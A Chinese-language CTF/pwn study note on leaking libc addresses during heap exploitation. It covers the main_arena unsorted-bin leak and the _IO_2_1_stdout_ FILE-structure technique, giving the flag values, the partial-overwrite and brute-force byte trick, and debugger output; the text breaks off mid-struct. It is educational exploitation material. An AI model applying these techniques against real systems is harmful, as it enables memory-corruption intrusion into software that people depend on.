泄漏libc
重点: glibc 的后三位是固定的
main_arena泄漏法
main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim()
-
unsorted bin中第一个chunk的bk和最后一个chunk的fd都指向main_arena+48(32位)或main_arena+88(64位)的位置
-
所以只需要将chunk释放到unsorted bin便可以泄漏libc的地址
IO_FIlE泄漏法
参考资料:
https://wiki.x10sec.org/pwn/linux/io_file/exploit-in-libc2.24-zh/
https://b0ldfrev.gitbook.io/note/pwn/iofile-li-yong-si-lu-zong-jie
-
控制指针指向libc的内存区域
-
libc中全局变量_IO_list_all是个链表,其中含有三个FILE结构体
_IO_2_1_stderr_
_IO_2_1_stdout
_IO_2_1_stdin_
-
_IO_2_1_stdout_ 低三字节是0x620,倒数第四字节可以爆破,例如设成0x2620持续攻击,总会有随机到0x2620的时候
-
修改FILE结构体如下,输出的时候会输出_IO_write_base指向的位置,默认_IO_write_base指向 _shortbuf,将_IO_write_base 低两字节改为\x20会打印_IO_2_1_stdout_ 本身,其中会包含、_IO_write_base 对应的值就是_IO_2_1_stdout_ 在libc中的地址
_flags = 0xfbad1800
_IO_read_ptr = 0
_IO_read_end = 0
_IO_read_base = 0
_IO_write_base = _IO_write_base &0xffffffffffffff00+0x20
-
调用puts或printf后收到的数据如下,会泄漏libc地址如下
00000000位置是_flags
00000020位置是_IO_write_base ->_IO_2_1_stdout_
[DEBUG] Received 0x127 bytes: 00000000 00 18 ad fb 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000020 20 26 2b 70 6e 7f 00 00 a3 26 2b 70 6e 7f 00 00 │ &+p│n···│·&+p│n···│ 00000030 a3 26 2b 70 6e 7f 00 00 a3 26 2b 70 6e 7f 00 00
_IO_write_base 默认指向_IO_2_1_stdout_+131的位置,把_IO_write_base 的值的最后两个字节改成0x20就是_IO_2_1_stdout_在libc中的地址
pwndbg> p _IO_2_1_stdout_ $1 = { file = { _flags = -72537977, _IO_read_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_read_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_read_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_write_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", _IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "", _IO_save_base = 0x0, _IO_backup_base = 0x0, _IO_save_end = 0x0, _markers = 0x0, _chain = 0x7ffff7dd18e0 <_IO_2_1_stdin_>, _fileno = 1, _flags2 = 0, _old_offset = -